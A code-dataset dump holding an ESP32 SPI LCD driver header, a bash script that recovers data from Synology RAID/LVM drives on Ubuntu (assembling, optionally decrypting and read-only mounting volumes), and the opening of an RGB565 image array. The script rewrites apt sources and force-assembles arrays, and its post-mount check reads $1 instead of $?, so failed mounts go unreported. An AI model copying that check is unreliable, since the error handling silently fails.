"qsc_code_frac_chars_hex_words": 1, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/include/spi_lcd.h | // Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef _IOT_SPI_LCD_H_
#define _IOT_SPI_LCD_H_
#include "driver/spi_master.h"
#include "iot_lcd.h"
#ifdef __cplusplus
extern "C" {
#endif
/** @brief Initialize the LCD by putting some data in the graphics registers
*
* @param pin_conf Pointer to the struct with mandatory pins required for the LCD
* @param spi_wr_dev Pointer to the SPI handler for sending the data
* @return lcd id
*/
uint32_t lcd_init(lcd_conf_t* lcd_conf, spi_device_handle_t *spi_wr_dev, lcd_dc_t *dc, int dma_chan);
/*Used by adafruit functions to send data*/
void lcd_send_uint16_r(spi_device_handle_t spi, const uint16_t data, int32_t repeats, lcd_dc_t *dc);
/*Send a command to the ILI9341. Uses spi_device_transmit,
which waits until the transfer is complete */
void lcd_cmd(spi_device_handle_t spi, const uint8_t cmd, lcd_dc_t *dc);
/*Send data to the ILI9341. Uses spi_device_transmit,
which waits until the transfer is complete */
void lcd_data(spi_device_handle_t spi, const uint8_t *data, int len, lcd_dc_t *dc);
/** @brief Read LCD IDs using SPI, not working yet
* The 1st parameter is dummy data.
* The 2nd parameter (ID1 [7:0]): LCD module's manufacturer ID.
* The 3rd parameter (ID2 [7:0]): LCD module/driver version ID.
* The 4th parameter (ID3 [7:0]): LCD module/driver ID.
* @param spi spi handler
* @param lcd_id pointer to struct for reading IDs
*/
void lcd_read_id(spi_device_handle_t spi, lcd_id_t *lcd_id, lcd_dc_t *dc);
/**
* @brief get LCD ID
*/
uint32_t lcd_get_id(spi_device_handle_t spi, lcd_dc_t *dc);
#ifdef __cplusplus
}
#endif
#endif
| 2,179 | spi_lcd | h | en | c | code | {"qsc_code_num_words": 378, "qsc_code_num_chars": 2179.0, "qsc_code_mean_word_length": 4.13756614, "qsc_code_frac_words_unique": 0.4021164, "qsc_code_frac_chars_top_2grams": 0.04603581, "qsc_code_frac_chars_top_3grams": 0.05754476, "qsc_code_frac_chars_top_4grams": 0.06138107, "qsc_code_frac_chars_dupe_5grams": 0.26662404, "qsc_code_frac_chars_dupe_6grams": 0.18158568, "qsc_code_frac_chars_dupe_7grams": 0.16624041, "qsc_code_frac_chars_dupe_8grams": 0.13554987, "qsc_code_frac_chars_dupe_9grams": 0.0971867, "qsc_code_frac_chars_dupe_10grams": 0.0971867, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02456332, "qsc_code_frac_chars_whitespace": 0.15924736, "qsc_code_size_file_byte": 2179.0, "qsc_code_num_lines": 62.0, "qsc_code_num_chars_line_max": 102.0, "qsc_code_num_chars_line_mean": 35.14516129, "qsc_code_frac_chars_alphabet": 0.82914847, "qsc_code_frac_chars_comments": 0.68563561, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.29411765, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.04233577, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.35294118, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 1.0, "qsc_codec_score_lines_no_logic": 0.47058824, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 1, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
007revad/Synology_Recover_Data | syno_recover_data.sh | #!/usr/bin/env bash
# shellcheck disable=SC2002
#---------------------------------------------------------------------------------------
# Recover data from Synology drives using a computer
#
# GitHub: https://github.com/007revad/Synology_Recover_Data
# Script verified at https://www.shellcheck.net/
#
# Run in Ubuntu terminal:
# sudo -i /home/ubuntu/syno_recover_data.sh
#
#---------------------------------------------------------------------------------------
# Resources used to develop this script:
#
# https://kb.synology.com/en-global/DSM/tutorial/How_can_I_recover_data_from_my_DiskStation_using_a_PC
#
# https://xpenology.com/forum/topic/54545-dsm-7-and-storage-poolarray-functionality/
#
#---------------------------------------------------------------------------------------
# Ubuntu 20.04.6 LTS and 22.04.4 LTS issues:
#
# WARNING: PV /dev/sdX in VG vgXX is using an old PV header, modify the VG to update
# https://access.redhat.com/solutions/5906681
# Can we just ignore the warning and not update header?
# https://community.synology.com/enu/forum/1/post/155289
#
# The latest mdadm does not support DSM's superblock location
# mount: /dev/XXXX: can't read superblock
# https://gist.github.com/cllu/5da648850ecfd30211bba140b132e824
#
#---------------------------------------------------------------------------------------
# Ubuntu 19.10 issues (solved)
#
# Getting old Ubuntu versions to download mdadm
# https://community.synology.com/enu/forum/1/post/155289
#
# Installing curl fails with 'apt-get install curl' so had to use 'apt install curl'
#---------------------------------------------------------------------------------------
#mount_path="/mnt"
#mount_path="/media"
mount_path="/home/ubuntu"
home_path="/home/ubuntu" # Location of .rkey files for decrypting volumes
scriptver="v1.1.13"
script=Synology_Recover_Data
repo="007revad/Synology_Recover_Data"
# Show script version
#echo -e "$script $scriptver\ngithub.com/$repo\n"
echo "$script $scriptver"
# Shell Colors
#Black='\e[0;30m' # ${Black}
#Red='\e[0;31m' # ${Red}
#Green='\e[0;32m' # ${Green}
#Yellow='\e[0;33m' # ${Yellow}
#Blue='\e[0;34m' # ${Blue}
#Purple='\e[0;35m' # ${Purple}
Cyan='\e[0;36m' # ${Cyan}
#White='\e[0;37m' # ${White}
Error='\e[41m' # ${Error}
Off='\e[0m' # ${Off}
ding(){
printf \\a
}
# Check script is running as root
if [[ $( whoami ) != "root" ]]; then
ding
echo -e "\n${Error}ERROR${Off} This script must be run as sudo or root!"
exit 1 # Not running as root
fi
# Check script is NOT running on a Synology NAS
if uname -a | grep -i synology >/dev/null; then
ding
echo -e "\nThis script is running on a Synology NAS!"
echo "You need to run it from a Linux USB boot drive."
exit 1 # Is a Synology NAS
fi
# Check script is NOT running on a Asustor NAS
if grep -s 'ASUSTOR' /etc/nas.conf >/dev/null; then
ding
echo -e "\nThis script is running on an Asustor NAS!"
echo "You need to run it from a Linux USB boot drive."
exit 1 # Is a Asustor NAS
fi
# Check mount path exists
while [[ ! -d $mount_path ]]; do
ding
echo -e "\n${Cyan}$mount_path${Off} folder does not exist!"
echo "Enter a valid path to mount your volume(s) then press enter."
read -r mount_path
done
# Set Ubuntu to get older version of mdadm that works with DSM's superblock location
sed -i "s|archive.ubuntu|old-releases.ubuntu|" /etc/apt/sources.list
sed -i "s|security.ubuntu|old-releases.ubuntu|" /etc/apt/sources.list
install_executable(){
# $1 is mdadm, lvm2 or btrfs-progs
#if ! apt list --installed | grep -q "^${1}/"; then # Don't use apt in script
if ! apt-cache show "$1" >/dev/null; then
echo -e "\nInstalling $1"
if [[ $aptget_updated != "yes" ]]; then
apt-get update
aptget_updated="yes"
fi
if [[ $1 == "mdadm" ]]; then
# apt-get won't install mdadm in Ubuntu 19.10
apt install -y mdadm
else
apt-get install -y "$1"
fi
fi
}
# Install curl if missing
install_executable curl
#------------------------------------------------------------------------------
# Check latest release with GitHub API
# Get latest release info
# Curl timeout options:
# https://unix.stackexchange.com/questions/94604/does-curl-have-a-timeout
release=$(curl --silent -m 10 --connect-timeout 5 \
"https://api.github.com/repos/$repo/releases/latest")
# Release version
tag=$(echo "$release" | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
#shorttag="${tag:1}"
if ! printf "%s\n%s\n" "$tag" "$scriptver" |
sort --check=quiet --version-sort >/dev/null ; then
echo -e "\n${Cyan}There is a newer version of this script available.${Off}"
echo -e "Current version: ${scriptver}\nLatest version: $tag"
fi
#------------------------------------------------------------------------------
# Install mdadm, lvm2 and btrfs-progs if missing
install_executable mdadm
install_executable lvm2
install_executable btrfs-progs
# Assemble all the drives removed from the Synology NAS
if which mdadm >/dev/null; then
echo -e "\nAssembling your Synology drives"
# mdadm options:
# -A --assemble Assemble a previously created array.
# -s --scan Scan config file for missing information.
# -f --force Assemble the array even if some superblocks appear out-of-date.
# This involves modifying the superblocks.
# -R --run Try to start the array even if not enough devices for a full array are present.
# if ! mdadm -AsfR && vgchange -ay ; then
# ding
# echo -e "${Error}ERROR${Off} Assembling drives failed!"
# exit 1
mdadm -AsfR # Ignore "no arrays found" because it could be a single drive
vgchange -ay
# fi
else
ding
echo -e "${Error}ERROR${Off} mdadm not installed!"
exit 1
fi
# Get device path(s)
if lvs | grep 'volume_' >/dev/null; then
# Classic RAID/SHR with multiple volume support
readarray -t array < <(lvs | grep 'volume_')
# volume_1 vg1 -wi-ao---- 43.63t
# /dev/${VG}/${LV}
# /dev/vg1/volume_1
for d in "${array[@]}"; do
LV="$(echo -n "$d" | awk '{print $1}')"
VG="$(echo -n "$d" | awk '{print $2}')"
device_paths+=("/dev/$VG/$LV")
done
elif lvs | grep -E 'vg[0-9][0-9][0-9][0-9]' >/dev/null; then
# SHR with single volume support
readarray -t array < <(lvs | grep -E 'vg[0-9][0-9][0-9][0-9]')
# lv vg1000 -wi-a----- 43.63t
# /dev/${VG}/${LV}
# /dev/vg1000/lv
for d in "${array[@]}"; do
LV="$(echo -n "$d" | awk '{print $1}')"
VG="$(echo -n "$d" | awk '{print $2}')"
device_paths+=("/dev/$VG/$LV")
done
else
# Classic RAID with single volume
readarray -t array < <(cat /proc/mdstat | grep '^md' | awk '{print $1}')
# /dev/${md}
# /dev/md4
for d in "${array[@]}"; do
if [[ $d != "md0" ]] && [[ $d != "md1" ]]; then
device_paths+=("/dev/$d")
fi
done
fi
# Ask user which device they want to mount (if there's more than 1)
if [[ ${#device_paths[@]} -gt "1" ]]; then
echo ""
PS3="Select the volume to mount: "
select device_path in "${device_paths[@]}"; do
if [[ $device_path ]]; then
if [[ -L $device_path ]]; then
echo "You selected $device_path"
break
else
ding
echo -e "Line ${LINENO}: ${Error}ERROR${Off} $device_path not found!"
exit 1 # Selected device_path not found
fi
else
echo "Invalid choice!"
fi
done
elif [[ ${#device_paths[@]} -eq "1" ]]; then
device_path="${device_paths[0]}"
else
ding
echo -e "\n${Error}ERROR${Off} No volumes found!"
exit 1 # No volumes found
fi
get_mount_dir(){
case "${1,,}" in
/dev/md*)
mount_dir="$(basename -- "$1")"
;;
/dev/vg*/volume_*)
mount_dir="$(basename -- "$1")"
maybe_encripted="yes"
;;
/dev/vg*/lv)
mount_dir="$(echo "$1" | cut -d"/" -f3)"
;;
esac
}
get_mount_dir "$device_path"
# Check if volume is already mounted
if findmnt "${mount_path}/$mount_dir" >/dev/null; then
echo -e "\n$device_path already mounted to ${mount_path}/$mount_dir"
findmnt "${mount_path}/$mount_dir" # debug
echo -e "\nYou can recover your data from:"
echo -e "- Files > Home > ${Cyan}${mount_dir}${Off}"
echo -e "- Files > ${Cyan}${mount_dir}${Off}"
echo -e "- ${Cyan}${mount_path}/${mount_dir}${Off} via Terminal\n"
exit
fi
# Check user is ready
echo -e "\nType ${Cyan}yes${Off} if you are ready to mount $device_path"
echo "to ${mount_path}/$mount_dir"
read -r answer
if [[ ${answer,,} != "yes" ]]; then
exit
fi
get_rkeys(){
# [NASNAME]_volume1.rkey
rkeys=( )
for rkey in "${home_path}"/*_volume"${device_path##*_}".rkey; do
#echo "$rkey" # debug
if [[ -f "$rkey" ]]; then
rkeys+=("$rkey")
fi
done
}
select_rkey(){
echo ""
if [[ ${#rkeys[@]} -gt 1 ]]; then
PS3="Select the correct recovery key: "
select recovery_key in "${rkeys[@]}"; do
if [[ $recovery_key ]]; then
if [[ -f $recovery_key ]]; then
echo -e "You selected $recovery_key"
break
else
ding
echo -e "Line ${LINENO}: ${Error}ERROR${Off} $recovery_key not found!"
exit 1 # Selected recovery key not found
fi
else
echo "Invalid choice!"
fi
done
elif [[ ${#rkeys[@]} -eq 1 ]]; then
recovery_key=${rkeys[0]}
echo -e "Using recovery key: $recovery_key"
else
ding
echo -e "Line ${LINENO}: ${Error}ERROR${Off} No recovery key found!"
exit 1 # No recovery key found
fi
}
# Encrypted volume
if [[ $maybe_encripted == "yes" ]]; then
echo -e "\nType ${Cyan}yes${Off} if $mount_dir is an encrypted volume"
read -r answer
if [[ ${answer,,} == "yes" ]]; then
# Get recovery key
get_rkeys
select_rkey
# Install cryptsetup if missing
install_executable cryptsetup
# Decode recovery key to file
base64_decode_output_path="${recovery_key%.*}"
base64 --decode "${recovery_key}" > "${base64_decode_output_path}"
code="$?"
if [[ $code -gt "0" ]]; then exit 1; fi
# Test recovery key
# cryptsetup open --test-passphrase /dev/vgX/volume_Y -S 1 -d ${base64_decode_output_path}
cryptsetup open --test-passphrase "$device_path" -S 1 -d "${base64_decode_output_path}"
code="$?"
if [[ $code -gt "0" ]]; then exit 1; fi
# Decrypt the encrypted volume
cryptvol="cryptvol_${device_path##*_}"
#echo "cryptvol: $device_path" # debug
# Remove any existing /dev/mapper/cryptvol_${device_path##*_}
if [[ -e "/dev/mapper/$cryptvol" ]]; then
umount -f "/dev/mapper/$cryptvol"
dmsetup remove -f "/dev/mapper/$cryptvol"
fi
# cryptsetup open --allow-discards /dev/vgX/volume_Y cryptvol_Y -S 1 -d ${base64_decode_output_path}
cryptsetup open --allow-discards "$device_path" "$cryptvol" -S 1 -d "${base64_decode_output_path}"
code="$?"
#if [[ $code -gt "0" ]]; then exit 1; fi
# Set device_path
device_path="/dev/mapper/$cryptvol"
#echo "device_path: $device_path" # debug
fi
fi
# NEED TO CREATE A MOUNT POINT FOR EACH DEVICE PATH IN ARRAY IF ALL SELECTED
# Create mount point(s)
echo -e "\nCreating mount point folder(s)"
if [[ ! -d "${mount_path}/$mount_dir" ]]; then
#mkdir -m777 "${mount_path}/$mount_dir"
#mkdir -m444 "${mount_path}/$mount_dir"
mkdir -m744 "${mount_path}/$mount_dir"
# Allow user to unmount volume from UI
chown ubuntu "${mount_path}/$mount_dir"
fi
# NEED TO MOUNT EACH DEVICE PATH IN ARRAY IF ALL SELECTED
# Mount the volume as read only
echo -e "\nMounting volume(s)"
mount "${device_path}" "${mount_path}/${mount_dir}" -o ro
code="$1"
#
# mount has the following return codes (the bits can be ORed):
# 0 success
# 1 incorrect invocation or permissions
# 2 system error (out of memory, cannot fork, no more loop devices)
# 4 internal mount bug or missing nfs support in mount
# 8 user interrupt
# 16 problems writing or locking /etc/mtab
# 32 mount failure
# 64 some mount succeeded
# Finished
if [[ $code -gt "0" ]]; then
ding
echo -e "${Error}ERROR${Off} $code Failed to mount volume!\n"
else
# Successful mount has null exit code
echo -e "\nThe volume is now mounted as ${Cyan}read only.${Off}\n"
echo -e "You can now recover your data from:"
echo -e "- Files > Home > ${Cyan}${mount_dir}${Off}"
echo -e "- Files > ${Cyan}${mount_dir}${Off}"
echo -e "- ${Cyan}${mount_path}/${mount_dir}${Off} via Terminal\n"
fi
exit
| 13,085 | syno_recover_data | sh | en | shell | code | {"qsc_code_num_words": 1792, "qsc_code_num_chars": 13085.0, "qsc_code_mean_word_length": 4.11662946, "qsc_code_frac_words_unique": 0.24051339, "qsc_code_frac_chars_top_2grams": 0.02168903, "qsc_code_frac_chars_top_3grams": 0.02277349, "qsc_code_frac_chars_top_4grams": 0.02765352, "qsc_code_frac_chars_dupe_5grams": 0.25660838, "qsc_code_frac_chars_dupe_6grams": 0.22326149, "qsc_code_frac_chars_dupe_7grams": 0.21160363, "qsc_code_frac_chars_dupe_8grams": 0.17676562, "qsc_code_frac_chars_dupe_9grams": 0.14911211, "qsc_code_frac_chars_dupe_10grams": 0.1323031, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02409397, "qsc_code_frac_chars_whitespace": 0.23874666, "qsc_code_size_file_byte": 13085.0, "qsc_code_num_lines": 403.0, "qsc_code_num_chars_line_max": 109.0, "qsc_code_num_chars_line_mean": 32.46898263, "qsc_code_frac_chars_alphabet": 0.71649433, "qsc_code_frac_chars_comments": 0.41658387, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.41395349, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.36931744, "qsc_code_frac_chars_long_word_length": 0.10271191, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/include/lcd_image.h | const uint16_t pic1_320_240[] = {
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
